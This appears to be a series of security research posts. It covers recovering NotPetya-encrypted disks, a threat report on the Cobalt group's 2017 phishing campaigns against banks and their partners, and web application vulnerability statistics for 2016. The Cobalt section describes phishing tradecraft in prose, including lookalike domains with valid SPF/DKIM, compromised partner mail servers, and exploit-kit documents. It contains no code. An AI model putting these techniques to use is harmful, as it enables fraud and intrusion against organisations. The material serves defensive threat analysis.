So from one file record (occupying two sectors), 8 bytes of the keystream can be retrieved, and each neighboring record provides two more bytes (and the possibility to verify the six previously obtained bytes). The final records are almost entirely composed of zeros, which can provide up to 1,024 additional bytes of the keystream.
After the keystream fragments used to encrypt the MFT are retrieved, the entire structure of the file system can be recovered.
Recovering the keystream by known files
NotPetya also encrypts the first two sectors of each file longer than 1,024 bytes. The cluster size usually exceeds 2 sectors (it can be 8 sectors, for example). In that case, after finding the encrypted header of any file and skipping 1,024 bytes, we can easily retrieve the next 3 kilobytes in plaintext. If we have a file in which exactly the same 3 kilobytes are at the offset of 1,024 bytes from the header, the file header will very likely also be the same. So we can retrieve up to 1,024 additional bytes of the keystream.
A clean install of Windows XP contains 8,315 files in the Windows folder. In Windows 8.1 installed on an actively used computer, this number exceeds 200,000. Chances are that many of them match the files on an encrypted disk.
Thanks to this, indexing DLL and EXE files from available Windows installations (preferably of the same version and with similar updates installed) may be enough to recover the keystream completely.
Having retrieved keystream fragments, you can also proceed to attempt recovery of unique files.
Prospects and pitfalls
Manual recovery of an encrypted disk is a tedious task—the process can take hours and requires a large amount of free disk space. Few users have a spare empty disk as large as the one that is encrypted, and attempting experiments on an infected original disk is a fool's errand.
So those wishing for an easy, hassle-free recovery tool are still out of luck. On the bright side, we can expect that professional service providers will be able to recover more data than has been the case to date.
Companies that specialize in data recovery are likely to come up with the necessary software, thanks to their experience and expertise.
That said, there are still a few snags in the way of recovery. The algorithm for selecting sectors to be encrypted (and which therefore need to be decrypted) contains errors as well (for example, when parsing NTFS structures), and this can have an effect on the result.
Recovering data from a hard drive using the described method requires applying certain heuristics. The completeness of data recovery depends on many factors (disk size, free space, and fragmentation) and may be able to reach 100% for large disks that contain many standard files (OS and application components that are identical on many machines and have known values).
As stated at the beginning of this article, this method unfortunately cannot be used to decrypt files that were encrypted with the AES algorithm, which is used by NotPetya when it is unable to obtain administrator privileges.
Thank you to Alexander Peslyak (Solar Designer) for his hints and suggestions, which helped to design the method described.
Author: Dmitry Sklyarov, Head of Reverse Engineering, Positive Technologies↧
↧
Cobalt strikes back: an evolving multinational threat to finance
1. Introduction
Bank robbery is perhaps the quintessential crime. The promise of immense, instant riches has lured many a criminal to target banks. And while the methods, tools, and scale of robbery have all changed, two things have stayed the same: the enticement of a hefty payday and the fact that no system is perfectly secure.In the modern digital economy, criminals are becoming ever more creative in ways to make off with millions without having to leave home. Despite enormous efforts, security is always a work in progress because of technical vulnerabilities and the human factor. Only a small fraction of banks today are able to withstand targeted attacks of the kind perpetrated by Cobalt, a cybercriminal group first described in 2016 that is currently active worldwide. Now the group has set its sights on more than just banks.
Researchers at Positive Technologies and other companies have described the group's methods previously. In this report, we will describe the new techniques used by Cobalt in 2017, the changing target profile, and recommendations on how to avoid becoming their latest victim.
2. Executive summary
The Cobalt group has been quick to react to banks' protective measures. When spam filters on mail servers began to block most of the group's phishing emails, which contained forged sender information, the attackers changed techniques. Now they actively use Supply Chain Attacks to leverage the infrastructure and accounts of actual employees at one company, in order to forge convincing emails targeting a different partner organization. This tactic has already been used by other attackers, such as when the infrastructure of M.E.Doc was used to spread the NotPetya virus, which blocked workstations at a large number of major companies.
Cobalt has attacked banks, financial exchanges, insurance companies, investment funds, and other financial organizations. The group is not afraid to use the names of regulatory authorities or security topics to trick recipients into opening phishing messages from illegitimate domains.
Here is some of the latest information about techniques used by the Cobalt group:
- Active attacks on bank partners in order to use partner infrastructure for sending phishing messages to banks.
- Phishing messages disguised as mailings from financial regulators.
- Various types of malicious attachments: document with an exploit (.doc, .xls, .rtf), archive with an executable dropper file (.scr, .exe), and archive with LNK file (.lnk).
- Among the first groups to get access to the latest version of the Microsoft Word Intruder 8 exploit builder, which made it possible to create documents exploiting vulnerability CVE-2017-0199.
- Poorly protected public sites are used to upload files and then download them to victim computers.
- Phishing messages are sent both to corporate addresses and personal addresses of employees.
3. What we already knew about Cobalt
4. Cobalt targets and objectives
The Cobalt group's traditional "stomping grounds" are the Eastern Europe, Central Asia, and Southeast Asia. In 2017, attacks grew to include North America, Western Europe, and even South America (Argentina).
Of the companies targeted by Cobalt in phishing mailings, around 75 percent are in the financial sector. Most of these financial companies are banks (90%), but others include financial exchanges, investment funds, and lenders. This widening range of targets suggests that attacks on diverse companies with major financial flows are underway. This concurs with the forecast made by the FinCERT of the Russian Central Bank, which predicted increased interest by cybercriminals in financial exchanges in 2017.
By attacking a financial exchange, the Cobalt group can "pump" or "dump" stocks, incentivizing purchase or sale of shares in certain companies in a way that causes rapid fluctuations in share price. Stock manipulation can affect not just the welfare of a single company, but the economy of entire countries. These methods were employed by the Corkow group in their 2016 attack on Russia's Energobank, which caused a 15-percent change in the exchange rate of the ruble and caused bank losses of RUB 244 million (over USD 4 million).
The remaining 25 percent of targeted companies represent diverse industries:
- Government
- Telecom/Internet
- Service Providers
- Manufacturing
- Entertainment
- Healthcare
Since the beginning of 2017, our researchers have studied over 60 unique samples of phishing messages sent as part of Cobalt campaigns. These messages were sent to over 3,000 people in 12 countries. The addresses include corporate addresses but also personal addresses, since employees often can check their email on work computers.
Notably, Cobalt attacks government organizations and ministries in order to use them as a stepping stone for other targets.
5. Chronology of Cobalt 2017 campaign
In early 2017, we noted that the Cobalt group was actively registering illegitimate domains. As soon as these domains were used to send phishing mailings, we notified the security departments of the targeted companies, as well as the FinCERT of the Russian Central Bank. Thanks to this timely intervention, the domains were blocked before the attackers could make use of them.
Positive Technologies has investigated incidents related to attacks by the Cobalt group at a number of companies in 2017. In several cases, the attackers compromised company infrastructure and employee accounts in order to send phishing messages to partner companies (i.e., companies that have a legitimate pre-existing business relationship with banks) in North and South America, Europe, CIS countries, and Central and Southeast Asia. Against targets in the CIS countries, the attackers also used their own infrastructure, which included rented dedicated servers located in North America, Europe, and Southeast Asia.
Several pieces of information suggest that the team responsible for the technical aspects of attacks consists of only a handful of people. When the attackers were at their most active inside target networks, the group would temporarily stop registering domain names and sending phishing mailings. Activity not aimed at the targeted infrastructure was not detected. The days and times of mailings are also suggestive in this regard, as described later in this report.
6. Cobalt attack methods
The Cobalt group relies on social engineering to penetrate networks—users open malicious attachments from phishing messages that are disguised by the attackers to resemble messages from legitimate companies and regulatory authorities. These attachments contain a document file, which downloads a dropper from a remote server or contains the dropper in a password-protected archive. Small in size, a dropper is used to download and run other malicious software (in the case of Cobalt, the Beacon Trojan).
Preparations and progression of a typical attack are illustrated below.
For information on the actions of Cobalt attackers inside the network of a targeted organization, please see our previous report.
1. Partner phishing
The Cobalt group's traditional method—sending messages with forged sender information—has fallen out of favor. Instead, the group has paid more attention to making sure that messages get delivered by dodging mail server filters.
For a targeted mailing ("spear phishing"), the criminals use previously registered domains. A domain name is chosen to be similar in meaning and spelling to the domain of the real company. For messages to make it through antispam and antivirus checks, the criminals correctly configure SPF entries on the DNS server and indicate the correct DKIM signatures for their messages. This approach allows bypassing verification of the address of the sender's mail server, but offers digital evidence for investigators.
Despite the increased complexity involved, in the first quarter of 2017 the Cobalt group also began to attack various companies that partner with banks, then sending phishing messages from these partners' infrastructures using the hacked accounts and mail servers of real employees.
This approach ensures that recipients are likely to trust the sender and has a number of advantages:
- Attackers get information stored on the servers and in the databases of the compromised partner organization. This information can be used to create convincing phishing messages.
- Attackers obtain access to employee accounts on workstations and mail servers, giving phishing messages a high degree of trust and plausibility among potential recipients.
- Messages from partners are not blocked by mail server filters.
The attackers carefully choose subject lines, recipient addresses, and attachment names that will "fly below the radar" so that recipients open the attachments enclosed with phishing messages.
Today, Cobalt uses phishing mailings at practically all stages of targeted attacks on banks.
1. Initial compromise starts with one or more workstations at a partner organization, which have been infected via phishing.
A message informing of "missed payments"
Instructions for connecting to a payment gateway—supposedly
2. The attack against the partner organization is then developed by means of internal mailings containing malicious documents supposedly from colleagues, management, or IT.
"Documents requested by the head of the department"
A message claiming to inform of payroll changes
3. Malicious messages are sent from the partner's infrastructure to banks and other financial organizations.
A password-protected archive (with the password "doc") supposedly containing an invoice for ATM maintenance
In early 2017, 60 percent of phishing messages from Cobalt related to cooperation and service terms between banks and their partners.
In 2017 Cobalt began to use security anxieties as an attack vector. The group has sent messages from illegitimate domains posing as VISA, MasterCard, and FinCERT units of the Russian Central Bank and National Bank of the Republic of Kazakhstan.
Broken English and copied boilerplate text can be convincing in the right circumstances
A fake FinCERT message
In Russia, this was a particularly ironic "twist" since FinCERT had been actively warning financial companies about the Cobalt threat. So the group took advantage of such anxiety to send messages to banks with malicious documents, supposedly on how to keep bank systems safe
A vague warning that asks the user to act immediately
So by creating counterfeit domains superficially similar to those of real companies, the criminals use the imprimatur of well-known organizations to convince users to open dangerous attachments.
Since real messages from colleagues and partners usually arrive during working hours, the criminals structured the mailings so that employees would receive them during working hours (no matter in which time zone the attackers themselves were located).
Most messages were received in the afternoon—the reason being that employees tend to be less vigilant, and therefore more susceptible to phishing, as the evening approaches.
We noticed a slight variation in tactics against North American companies. Messages targeting U.S. and Canadian organizations were sent from the compromised infrastructure of a European partner. For the phishing messages to be plausibly European in origin, the criminals performed the mailing during European working hours, due to which the targets received emails in the early waking hours in the U.S. and Canada.
2. Malicious attachments
To ensure remote access to the workstation of an employee at a target organization, the Cobalt group (as in previous years) uses Beacon, a Trojan available as part of commercial penetration testing software Cobalt Strike.
The Trojan is delivered and run with the help of a special dropper. The dropper consists of .scr or .exe files that are placed on the victim's computer in one of the following ways:
- In a password-protected ZIP archive, the password to which is given in the text of the phishing message.
- Downloaded from a hacked website when a malicious attachment (.doc, .xls, .rtf) is opened from the phishing message.
- Downloaded from a hacked website based on commands coded in a LNK file that is in a ZIP archive attached to the message.
Poorly protected websites are compromised by the attackers and used, in essence, as file hosts for spreading malicious files in attacks against banks.
52 percent of the Cobalt phishing messages reviewed by our researchers contained Microsoft Word documents.
The malicious Microsoft Office documents that trigger download of the dropper are created using the Ancalog and Microsoft Word Intruder (MWI) exploit kits. With these kits, even a hacker without programming skills can create malicious Word documents and PDF files in an intuitive visual interface in just minutes.
The Cobalt group was one of the first to get their hands on a restricted version of MWI that can create documents exploiting the critical vulnerability CVE-2017-0199. Since the version in question was sold on an individual basis to customers well known to the developer, there may be a relationship between the Cobalt group and developer of MWI. One instructive fact in this regard is that less than a week passed between announcement of a new MWI version and use by Cobalt of attachments exploiting vulnerability CVE-2017-0199.
MWI is positioned by its developer as a tool for performing APT attacks; if the software is instead used to create files for mass spamming, the developer revokes the license. For users of the restricted version of MWI, the developer offers a sort of "scrubbing" so that files will not be flagged by currently available antivirus scanners.
The MWI developer boasting of the "product" online
Malicious documents sent by Cobalt to banks and their partners use exploits for vulnerabilities CVE-2017-0199, CVE-2015-1641, and CVE-2012-0158 in order to download and run the dropper on the victim system.
An official-seeming document about how to pay overdue debts
When the attachment is opened, malicious code is run. This code takes advantage of vulnerabilities in Microsoft Office to download the dropper from a remote server and run it. After the code finishes running, a decoy document (such as shown in the screenshot) is displayed.
The attackers upload files to vulnerable sites in advance, from where the files can be later downloaded to victim systems during an attack. Therefore we urge website owners to be vigilant in securing their sites: if weak protections cause a site to become a staging ground for malware, regulators may block the site or law enforcement may seize server equipment as part of a criminal investigation. Public knowledge of such incidents is likely to cause severe damage to company reputation.
Usually Cobalt phishing messages are sent in several waves. In the first wave, the criminals send Microsoft Office documents created using the described exploit kits.
If there are no "hits" from targeted users within 24 hours of a mailing (this is possible if a company has up-to-date versions of Microsoft Office that are free of the vulnerabilities targeted by the exploit builders), the attackers send a second wave.
Attached to the messages is a dropper, consisting of .exe or .scr executable files, in a password-protected archive. By placing the files in an archive, the attackers can bypass some filtering and antivirus systems. Solutions are available for real-time scanning of encrypted archives (when the password is indicated in the body of the message, as is the case here) but organizations making use of such software are few and far between.
In addition, we have observed a separate mailing in which the attached archives contained LNK files; as in all the other cases, these files are used to download the Beacon dropper.
3. Cobalt infrastructure
Since a Cobalt mailing is sent to thousands of recipients, the group clearly is using some sort of automation. Based on analysis of the phishing messages, we believe that the messages are sent from phishing domains with the help of alexusMailer v2.0, a freely available PHP script used to send emails anonymously.
alexusMailer and other scripts are available on forums
The script includes support for multithreaded sending, a visual editor for messages, import of recipient lists and other fields from files, templates, attaching any number of files to a message, and more. Users can distribute sending tasks over a number of servers and set a delay for message sending.
alexusMailer interface
However, when messages are sent with alexusMailer, the message header contains an artifact: the X-PHP-Originating-Script field contains the name of the file of the PHP script that was used to send the messages. This means that on servers used for sending, the php.ini configuration file is set to log outgoing mail.
The Cobalt group uses widely availably public mail services, as well as services that allow anonymous registration of temporary addresses. Some of the domains used for reply addresses in Cobalt mailings include: TempMail (@doanart.com, @rootfest.net), Mail.com (@mail.com), AT&T Mail (@att.net, @sbcglobal.net), and Yahoo! (@ymail.com). These same services were used by Cobalt to create email addresses when registering domains.
Based on the times at which the domains in the Cobalt infrastructure were registered, we found that the attackers tended to register domains towards the beginning of the week. This enables us to speculate on their working schedule:
− On weekdays, the attackers actively register domains, prepare hacking tools, and (less often) send phishing mailings.
− At the end of the week, the group concentrates on sending out mailings and advancing their attacks within the infrastructure of compromised organizations.
− Since phishing mailings are sent out during working hours, domains are usually registered during the interval from 6:00 PM to 12:00 AM (UTC+0), which coincides with the end of the working day in European countries.
It would seem that after registering a domain at the beginning of the week, the Cobalt group takes some time to prepare for their upcoming phishing campaign, which as noted usually comes at the end of the week. On average, the time from domain registration to the first phishing mailing with that same domain is four days.
Our researchers discovered a number of Cobalt phishing domains before the group was able to use them in its phishing campaigns. By acting quickly, it was possible to block the domains.
Working in cooperation with industry regulators in Russia and other countries, we have succeeded in disabling delegation for all .ru domains and most other top-level domains known to be associated with Cobalt.
7. Conclusion
The barrier to entry for would-be cybercriminals keeps falling every year. No longer do hackers need to look for zero-day vulnerabilities and expensive tools to perform attacks. Instead, all they require are basic programming skills, commercially available software, and instructions posted on the Internet.
Banks and other companies must realize that attackers are constantly refining the tools and techniques they use. In today's environment, a company can fall victim just by getting caught in the middle as attackers scout for stepping stones to reach their ultimate target. That's why responsible companies can no longer remain complacent about security and pretend that hackers go after only large companies and banks, or target only far-away areas of the world. No matter their industry or ownership—whether banks, state-owned organizations, or whatever else—companies must keep protection of their digital infrastructure current and proactively update their software and operating systems. Employees must be trained to increase their security awareness and resist phishing attempts. Moreover, scanning should go beyond just incoming messages and attachments to include outgoing messages, with retrospective analysis. Public-facing web applications must also be protected—if company infrastructure or sites are compromised by an attacker, this can wound company reputation, cause blocking of company servers, trigger a drop in search engine ratings, and drive away customers.
Information about the extent of losses caused by the Cobalt group in 2017 is not yet available. Perhaps warnings by bank regulators headed off some of the group's efforts. We will continue to monitor the Cobalt group and report new details as they become available. Judging by the scale of Cobalt campaigns worldwide, multimillion-dollar losses by banks are a real possibility. And if attacks on financial exchanges are successful, the consequences will include not only direct losses to individual companies, but rate turbulence on world currency markets.
↧
Web application vulnerability report: time to dig into the source code
Introduction
Every year, web applications expand their presence in more and more areas. Almost every business has its own web applications for clients and for internal business processes. However, application functionality is often prioritized at the expense of security, which negatively affects the security level of the entire business.As a result, web application vulnerabilities provide massive opportunities for malicious actors. By taking advantage of mistakes in application architecture and administration, attackers can obtain sensitive information, interfere with web application functioning, perform DoS attacks, attack application users, penetrate a corporate LAN, and gain access to critical assets.
This report provides statistics gathered by Positive Technologies while performing web application security assessments throughout 2016. Data from 2014 and 2015 is provided for comparison purposes.
This information suggests paths of action: which security flaws in web applications require attention during development and operation, how to distinguish potential threats, and what the most effective techniques for security assessment are. We also illustrate trends over time in web application development in the context of information security.
1. Materials and methods
Data for this report is drawn from 73 web applications examined in 2016 for which Positive Technologies conducted in-depth analysis. Some of the applications are publicly available on the Internet, while others are used for internal business purposes. We excluded vulnerabilities detected in the course of penetration testing, perimeter scanning, and online banking security audits; this information can be found in the respective reports.Vulnerability assessment was conducted via manual black-, gray-, and white-box testing (with the aid of automated tools) or automated source code analysis. Black-box testing means looking at an application from the perspective of an external attacker who has no prior or inside knowledge of the application. Gray-box testing is similar to black-box testing, except that the attacker is defined as a user who has some privileges in the web application. The most rigorous method, white-box scanning, presupposes the use of all relevant information about the application, including its source code. Results of manual security assessment are given in Section 5 of this report, while the results of automated scanning are in Section 6.
Vulnerabilities were categorized according to the Web Application Security Consortium Threat Classification (WASC TC v. 2), with the exception of Improper Input Handling and Improper Output Handling, as these threats are implemented as part of a number of other attacks. In addition, we distinguished three categories of vulnerabilities: Insecure Session, Server-Side Request Forgery, and Clickjacking. These categories are absent from the WASC classification, but can be often found in the web applications studied.
The Insecure Session category includes session security flaws, such as missing Secure and HttpOnly flags, which allow attackers to intercept the user's cookies in various attacks.
Server-Side Request Forgery is a vulnerability that allows sending arbitrary HTTP requests while posing as the system. After receiving a URL or an HTTP message, a web application performs an insufficient destination check before sending a request. An attacker can exploit this vulnerability and send requests to servers with restricted access (for example, computers on a LAN), which can result in disclosure of confidential data, access to application source code, DoS attacks, and other problems. For example, an attacker can obtain information about the structure of network segments that are not available to external users, access local resources, and scan ports (services).
Clickjacking is a kind of attack on users involving visual deception. In essence, a vulnerable application is loaded in a frame on the application page and is disguised as a button or another element. By clicking this element, a user performs the attacker-chosen action in the context of that website. The vulnerability that makes this attack possible occurs when the application does not return an X-Frame-Options header and therefore allows showing the application in frames. In some browsers, this vulnerability also allows performing a Cross-Site Scripting attack.
Our report includes only code and configuration vulnerabilities. Other widespread security weaknesses, such as flaws in the software update management process, were not considered.
The severity of vulnerabilities was calculated in accordance with the Common Vulnerability Scoring System (CVSS v. 3). Based on the CVSS score, our experts assigned vulnerabilities one of three severity levels: high, medium, or low.
2. Executive summary
All web applications analyzed have vulnerabilities.
Security flaws were found in all the applications analyzed. 58 percent had at least one high-severity vulnerability. At the same time, we see a positive trend: the number of websites with high-severity vulnerabilities decreased by 12 percent compared with 2015.Application users are not protected.
Most of applications allow attacks on their users. Moreover, a number of applications provide insufficient protection of user data. For instance, we gained access to personal data of 20 percent of the applications that process user information, including bank and government websites.Leaks are still a pressing problem.
Approximately half of web applications are exposed to leaks of critical data, including source code and personal data. 63 percent of web applications disclose the versions of software in use.Web application vulnerabilities are an easy vector for LAN penetration.
One in every four web applications allows attacks on LAN resources. For example, an attacker can access files, scan hardware on the LAN, or attack network resources. Besides, one out of every four applications was vulnerable to SQL Injection (high severity), which allows attackers to access the application database. In addition, this vulnerability could allow an attacker to read arbitrary files or create new ones, as well as launch DoS attacks.Manufacturing companies are the most vulnerable.
Almost half of manufacturing web applications received the lowest grade possible. The majority of web applications in all industries—with the exception of finance—were exposed to high-severity vulnerabilities. In finance, "only" 38 percent of applications had high-severity vulnerabilities.64 percent of ASP.NET applications contain high-severity vulnerabilities.
Additionally, approximately one out of every two PHP and Java applications contains high-severity vulnerabilities. PHP applications were particularly affected, with an average of 2.8 per application.Production systems are more vulnerable than test applications.
In 2016, production systems turned out to be less protected. During manual testing, high-severity vulnerabilities were found on 50 percent of testbeds and on 55 percent of production systems. The number of high- and medium-severity vulnerabilities per application on production systems was twice as high compared to test systems.Source code analysis is more effective than black-box testing.
Manual analysis of source code enabled our experts to detect high-severity vulnerabilities in 75 percent of applications. Black-box testing revealed such vulnerabilities on only 49 percent of web applications.Automated testing is a fast way to find vulnerabilities.
Automated analysis of source code found an average of 4.6 high-severity, 66.9 medium-severity, and 45.9 low-severity vulnerabilities per application. Source-code analysis with the help of automated tools can identify all exit points—in other words, all possible exploits for each vulnerability—reliably and rapidly.3. Participant portrait
The applications represent companies from a wide array of industries, including finance, government, media, telecoms, manufacturing, and e-commerce.Figure 1. Participant portrait
Almost two thirds of these applications (65%) were production sites (in other words, currently operating and available to users).
Figure 2. Production and test systems
This year, PHP and Java were the most common development languages used. The proportion of ASP.NET applications increased year-over-year. Development languages in the "Other" category (Ruby, Python, etc.) accounted for only 7 percent.
Figure 3. Web application development tools
4. Trends
All web applications, whether examined using manual or automated security assessment tools, contained vulnerabilities with various severity levels. Only 1 percent of applications had solely low-severity vulnerabilities. We can see some improvement in the percentage of applications with high-severity vulnerabilities, which fell from 70 percent in 2015 to 58 percent in 2016. This improvement is partially driven by the fact that companies took account of last year's security findings when developing new web applications, and, perhaps most importantly, concentrated on remediating high-severity vulnerabilities.Figure 4. Percentage of web applications whose worst vulnerabilities were of high, medium, or low severity
In general, we observed a discouraging trend in high-severity vulnerabilities during the three previous research periods. But growth in these vulnerabilities slowed down in 2015, and finally in 2016 they actually fell. Still, critical flaws were found in more than half of applications.
Medium-severity vulnerabilities were detected in almost all applications. Every year, this percentage is consistently in the range of 90 to 100 percent. The percentage of web applications with low-severity vulnerabilities increased.
Figure 5. Websites by vulnerability severity
5. Manual web application security testing
Out of all vulnerabilities detected by manual testing, the majority (81%) were of medium severity, with one tenth being of high severity. Compared to 2015, the share of high-severity vulnerabilities substantially decreased, but this is explained by the fact that in 2016 far more medium-severity vulnerabilities per application were detected.Figure 6. Vulnerabilities by severity (results of manual analysis)
Security flaws were found in all web applications. Manual testing uncovered high-severity vulnerabilities in more than half of analyzed applications (54%), 44 percent of applications contained medium- and low-severity vulnerabilities, and a mere 2 percent of applications had only low-severity vulnerabilities.
Figure 7. Web applications by maximum vulnerability severity (results of manual analysis)
On average, manual analysis found 17 medium-severity, 2 high-severity, and 2 low-severity vulnerabilities per application.
Figure 8. Average number of vulnerabilities per application (results of manual analysis)
5.1. Most common vulnerabilities
In 2016, half of the top 10 vulnerabilities allowed performing attacks against web application users.Figure 9. Most common vulnerabilities detected by manual testing (percentage of web applications)
As in 2015, Cross-Site Scripting (medium severity) tops the list and was found in 75 percent of the web applications examined. Successful exploitation of this vulnerability could allow an attacker to inject arbitrary HTML tags and JavaScript scripts into a browser session, obtain a session ID, conduct phishing attacks, and more.
Similarly to past years, Positive Technologies used its information on attacks against web applications to create a list of the most common attacks. Sources of data are pilot projects involving deployment of PT Application Firewall. To hack a website or attack its users, attackers try to exploit various vulnerabilities in web application design and administration. Research revealed that 58 percent of applications that took part in pilot projects underwent attempts to attack users with Cross-Site Scripting—the most common vulnerability in this year's rating.
Figure 10. Cross-Site Scripting attack attempts (percentage of web applications)
Flaws leading to disclosure of information about the current software version (Fingerprinting) were found in 63 percent of applications, taking second place. In addition, more than half of web applications (54%) are vulnerable to Information Leakage, such as of source code and personal data.
Third place went to poor or non-existent protection against brute-force attacks. The percentage of applications vulnerable to this kind of vulnerability increased by 10 percent year-over-year.
Insufficient Session Security and Clickjacking took the next two places in our top 10 list. These categories made their first appearance in 2016, so no comparison with the previous year is possible. While developers became more careful about eliminating high-severity vulnerabilities that threaten application owners, flaws causing damage to users took center stage this year. Vulnerabilities to Cross-Site Request Forgery, which also allows attacks on users, were detected in 35 percent of web applications.
As already mentioned, the total share of websites containing high-severity vulnerabilities has fallen, and only one high-severity vulnerability—SQL Injection—made the top 10 this year, yet still it was found in 25 percent of web applications. According to our research, this vulnerability was the most commonly exploited one in 2016: attackers attempted to exploit it in 84 percent of web applications.
Figure 11. SQL Injection attack attempts (percentage of web applications)
Client-side vulnerabilities were detected in 59 percent of all applications examined in 2016. Among these vulnerabilities are Cross-Site Scripting, Cross-Site Request Forgery, session security flaws, and other security problems that make it possible to attack web application users. The remaining 41 percent of detected vulnerabilities, such as Information Leakage and Insufficient Authorization, are on the server side.
Figure 12. Vulnerabilities by attack target
Most of the vulnerabilities detected (73%) were found in software code and are connected with development mistakes—such as SQL Injection. Misconfiguration of web servers is responsible for about a quarter of all security flaws.
Figure 13. Vulnerability types
5.2. Analysis of threats and security levels
We graded web application security based on the possible consequences of exploitation of the vulnerabilities that we found, from "extremely poor" to "acceptable." An extremely poor security level means high-severity vulnerabilities that, for example, allow an external attacker to perform OS Commanding or lead to disclosure of sensitive information. In general, if a web application has vulnerabilities of high severity, its security level varies from "extremely poor" to "below average."The overall level of web application security is still rather low. Experts rated the security of 16 percent of web applications as extremely poor.
One in every three examined web applications (32%) is characterized by a poor security level. Only 5 percent of applications are sufficiently protected.
Figure 14. Web application security level
The lowest grades ("poor" and "extremely poor") in 2016 went to applications used by online stores, manufacturers, and telecommunications companies: more than half of them had poor or extremely poor security. More than a third of e-commerce (34%) and manufacturing (43%) web applications received the lowest grade possible, "extremely poor." The security of financial and governmental applications is marginally better. Only 15 percent of telecom web applications could boast of acceptable security. The sample size for media applications was insufficient for drawing conclusions.
Figure 15. Web application security grade (by industry)
In 2016, the most widespread threat was attacks on web application users: such attacks are possible in nearly all web applications (94%). As mentioned in the previous section, a quarter of web applications contain vulnerabilities that can give an attacker access to databases. The same share of web applications (25%) can be a vector of penetration to a corporate LAN: these applications allow outsiders to scan hardware, learn about the network structure, and send requests to local nodes. About one in every five applications (19%) makes it possible to execute arbitrary OS commands on a server.
Note that DoS attacks were not attempted as part of application testing. Nevertheless, a number of applications had vulnerabilities that allow performing such attacks.
Figure 16. Most common threats
By and large, the vulnerabilities that enabled attacks on users were Cross-Site Scripting, Cross-Site Request Forgery, Open Redirect, Insecure Session, and Clickjacking. These development flaws are in this year's list of top 10 common vulnerabilities.
Figure 17. Vulnerabilities enabling attacks on users
An attacker can gain access to 70 percent of web applications. Such access is generally made possible by a weak password policy, absence of brute-force protection, and ability to conduct attacks on users.
The third and fourth places in our top 10 went to information leaks. Disclosure of information about the software version in use is a low-risk vulnerability, but in the case of outdated software, an attacker can take advantage of known vulnerabilities by using publicly available exploits.
By exploiting various vulnerabilities, we managed to obtain the source code of 8 percent of web applications. By analyzing source code, attackers can detect other vulnerabilities in a web application and advance an attack vector. Source code can contain sensitive information that enables access to critical resources.
Figure 18. Percentage of web applications in which access to source code was possible
Users' personal data is also under threat—attackers can gain access to 20 percent of web applications that process such data, including financial and governmental applications. Attackers can obtain information about users by taking advantage of an information leak or exploiting other vulnerabilities, such as SQL Injection.
Figure 19. Percentage of web applications in which users' personal data can be obtained
While reviewing critical threats by industry, we can notice that governmental, financial, and telecom applications contain the full range of high-severity vulnerabilities. Access to DBMS and OS Commanding threats are more common among e-commerce and manufacturing web applications.
Figure 20. Critical threats by industry
5.3. Statistics by industry
This section provides per-industry statistics on telecom, financial, e-commerce, governmental, and manufacturing web applications. Statistics for media applications are not given here, since the sample size was insufficiently large.The majority of web applications in all industries—with the notable exception of finance—were exposed to high-severity vulnerabilities. High-severity vulnerabilities were found on the sites of 74 percent of telecoms, 67 percent of governmental institutions and online stores, and 57 percent of manufacturing companies. In finance, only 38 percent of applications had high-severity vulnerabilities.
Figure 21. Web applications by vulnerability severity
Medium-severity vulnerabilities were found in all examined web applications, with the exception of some telecom applications. The telecom industry was prone to contrasts: many applications had high-severity vulnerabilities, but at the same time, there was a small contingent of relatively well-secured web applications containing only minor flaws.
Figure 22. Web applications by maximum severity of vulnerabilities (percentage of applications)
Comparing web applications by their average number of vulnerabilities, governmental applications have more high-severity vulnerabilities than any other industry and rank first with 6.2 vulnerabilities per application. In 2015, this value was much smaller (0.7 vulnerabilities per web application). In previous years, security assessment was carried out only for important governmental web applications, for which security was one of the core development requirements. But now governments are broadening their attention to encompass existing web applications, including those with a rather low security level.
E-commerce web applications also have a large number of high-severity vulnerabilities. These web applications also have the highest rate of medium-severity vulnerabilities. On average, 39.3 vulnerabilities per application were detected in e-commerce applications, compared to 27.5 vulnerabilities in governmental applications.
About two high-severity vulnerabilities on average can be found per manufacturing or telecom application. The most secure are financial web applications, with only 0.8 high-severity vulnerabilities per application.
Figure 23. Average number of vulnerabilities per application by industry
In 2016, one of the most common high-risk vulnerabilities in web applications across all industries was SQL Injection. Other common vulnerabilities were XML External Entities, OS Commanding, and Path Traversal. Various telecom and financial applications contained all these flaws, but this may not necessarily be representative, since these industries also accounted for the majority of the dataset.
Figure 24. Percentage of websites with common vulnerabilities, by industry
5.4. Vulnerabilities in web applications by development tools
As in 2015, all examined applications, regardless of the development tool used, contained at least medium-level vulnerabilities. Statistics are given for PHP, Java, and ASP.NET applications. Applications written in other, less common languages were too few to provide meaningful statistics. However, almost all applications written in less common languages contained high-severity vulnerabilities, and in just one case were there only low-severity vulnerabilities.Figure 25. Web applications by maximum vulnerability severity
The choice of PHP versus Java for development had virtually no effect on the severity of application vulnerabilities in 2016. All applications had medium-severity vulnerabilities, and more than half contained high-severity vulnerabilities.
The highest rate of high-severity vulnerabilities was observed among ASP.NET applications, with 64 percent containing such vulnerabilities. As compared to PHP and Java, the percentage of ASP.NET applications with medium-severity and low-severity vulnerabilities is slightly lower: 93 and 50 percent respectively. However, the average ASP.NET application had fewer high-severity vulnerabilities than its PHP and Java counterparts.
Figure 26. Web applications with vulnerabilities of various severity levels
As mentioned previously, the number of high-severity vulnerabilities has fallen significantly compared to previous years. On average, we see about two high-severity vulnerabilities per application, with PHP applications having the highest number of such vulnerabilities (2.8). The number of medium-severity vulnerabilities, on the contrary, increased compared to 2015 (for PHP and Java), with Java applications containing twice as many vulnerabilities of this level as other applications.
Figure 27. Average number of vulnerabilities per application, by development tools
The table includes statistics on the frequency of common vulnerabilities among resources developed by different tools.
Table 1. Most common vulnerabilities by development platform
The most common vulnerability in all applications was Cross-Site Scripting. More than 60 percent of applications, across all programming languages, were vulnerable to it. Security flaws related to Information Disclosure are also common: Information Leakage and Fingerprinting.
Compared to 2015, PHP and Java applications had fewer high-severity vulnerabilities. For example, Path Traversal, which was common in previous years, did not make the top 10 this year.
Nevertheless, 26 to 29 percent of applications in each category are vulnerable to SQL Injection, more than a quarter of PHP applications (26%) are vulnerable to OS Commanding, and one of the most common vulnerabilities for all other development tools is XML External Entities.
Regardless of development tool or language, however, applications across the board were generally exposed to common vulnerabilities, as shown in the following figures.
Figure 28. Applications with the most common vulnerabilities, by development tool (part 1)
Figure 29. Applications with the most common vulnerabilities, by development tool (part 2)
5.5. Vulnerabilities in test and production applications
In 2016, production systems proved more vulnerable than test systems. High-severity vulnerabilities were found on 50 percent of testbeds and on 55 percent of production systems.Figure 30. Systems by maximum vulnerability severity (percentage of systems)
